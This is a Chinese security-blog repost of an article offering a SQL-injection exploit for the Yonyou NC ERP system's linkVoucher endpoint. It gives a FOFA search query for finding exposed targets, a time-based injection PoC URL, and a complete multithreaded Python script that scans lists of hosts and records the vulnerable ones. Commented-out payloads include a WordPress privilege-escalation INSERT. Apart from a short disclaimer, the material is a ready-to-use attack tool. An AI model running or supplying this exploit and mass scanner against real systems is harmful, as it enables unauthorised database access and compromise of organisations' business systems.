用友 NC linkVoucher SQL注入 用友漏洞利用

admin 2024年9月28日10:11:33评论34 views字数 4718阅读15分43秒阅读模式
前言‍‍‍‍‍‍‍‍
用友 NC linkVoucher SQL注入  用友漏洞利用
声明:本文仅供学习参考使用,如若造成其他不良影响,均与本公众号无关!

漏洞复现‍‍‍‍‍

fofa查询语句:

app="用友-UFIDA-NC"

利用脚本进行检测:‍‍‍‍‍

用友 NC linkVoucher SQL注入  用友漏洞利用

手工复现:

用友 NC linkVoucher SQL注入  用友漏洞利用

POC

/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'--

批量检测脚本

import requests
import re
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
import os
 
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url_list = []
file_name = '用友NC系统 linkVoucher sql注入'
# fofa:app="用友-UFIDA-NC"
def get_ua():
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
 
    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
                  )
    return ua
 
 
proxies = {'http': 'http://127.0.0.1:8080',
           'https': 'http://127.0.0.1:8080'}
 
 
def wirte_targets(vurl, file_name):
    with open(file_name, "a+") as f:
        f.write(vurl + "\n")
 
 
def check_file(filename):
    print('-------------------------------------------')
    file_path = f'{file_name}_vuln.txt'
    if os.path.isfile(file_path):
        print('存在漏洞的url如下~~~')
        with open(file_path, 'r') as file:
            lines = file.readlines()
            for line in lines:
                print(f'\033[32m{line.strip()}\033[0m')
        math_url = str(len(lines))
        print('存在漏洞url:{}个'.format(math_url))
    else:
        print('未发现漏洞!!!!')
    print('-------------------------------------------')
 
 
def check_vuln(url):
    url = parse.urlparse(url)
    url1 = url.scheme + '://' + url.netloc
    vuln_url = f'{url[0]}://{url[1]}/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1\'waitfor+delay+\'0:0:5\'--'
    headers = {
        'User-Agent': get_ua(),
        # 'SOAPAction': '',
        # 'Cache-Control': 'no-cache',
        # 'Upgrade-Insecure-Requests': '1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        # 'Referer': f'http://{url[0]}://{url[1]}/wp-admin/plugins.php?plugin_status=all&paged=1&s',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'keep-alive',
        'Cache-Control': 'max-age=0',
    }
 
    # headers1 = {
    #     'User-Agent': get_ua(),
    #     'Accept': '*/*',
    #     'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    #     'Accept-Encoding': 'gzip, deflate',
    #     'Content-Type': 'application/x-www-form-urlencoded',
    #     'Connection': 'close',
    # }
 
    # data = '''<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   # <soapenv:Header/>
   # <soapenv:Body>
    #   <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
     #     <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
   #    </ser:getUserNameById>
  #  </soapenv:Body>
# </soapenv:Envelope>
# '''
    # data1 = '''q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c'''
    # data2 = '''q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f'''
 
    try:
        res = requests.get(url=vuln_url, headers=headers, allow_redirects=False, timeout=15, verify=False)
        # res1 = requests.post(url=vuln_url, headers=headers, data=data1, allow_redirects=False, timeout=15, verify=False)
        # res2 = requests.post(url=vuln_url, headers=headers1, data=data2, allow_redirects=False, timeout=15, verify=False)  #
        res_time = res.elapsed.total_seconds()
        if res_time >= 5: #and res_time >= 5
            print('\033[32m[+]{}   延迟:{}秒\033[0m'.format(vuln_url,res_time))#   延迟:{}秒
            wirte_targets(vuln_url+f'   延迟:{res_time}秒', f"{file_name}_vuln.txt")
 
        else:
            print("\033[34m[-]{} not vulnerable. {}\033[0m".format(url1, res.status_code))
    except Exception as e:
        print("\033[31m[!]{} is timeout\033[0m".format(url1))
 
 
 
 
def multithreading(url_list, pools=5):
    works = []
    for i in url_list:
        works.append(i)
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(check_vuln, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
 
 
if __name__ == '__main__':
    print(f"\n{file_name}\n                         ——————by hyuya~\n"
          f"                            ——————知识星球:大自然的nday搬运库(石占)")
 
    arg = ArgumentParser(description=f'{file_name}')
    arg.add_argument("-u",
                     "--url",
                     help="Target URL; Example:http://ip:port")
    arg.add_argument("-f",
                     "--file",
                     help="Target URL; Example:url.txt")
    args = arg.parse_args()
    url = args.url
    filename = args.file
    start = time()
    print('[*]任务开始...')
    if url != None and filename == None:  # and cmd==None
        check_vuln(url)
        check_file(f'{file_name}_vuln.txt')
    elif url == None and filename != None:  #and cmd==None
        for i in open(filename):
            i = i.replace('\n', '')
            url_list.append(i)
    multithreading(url_list, 10)
    end = time()
    print('任务完成,用时%d' % (end - start))
    check_file(f'{file_name}_vuln.txt')

 

 

原文始发于微信公众号(Undoubted Security):【漏洞分享】用友 NC linkVoucher SQL注入 用友漏洞利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日10:11:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友 NC linkVoucher SQL注入 用友漏洞利用https://cn-sec.com/archives/3108337.html

发表评论

匿名网友 填写信息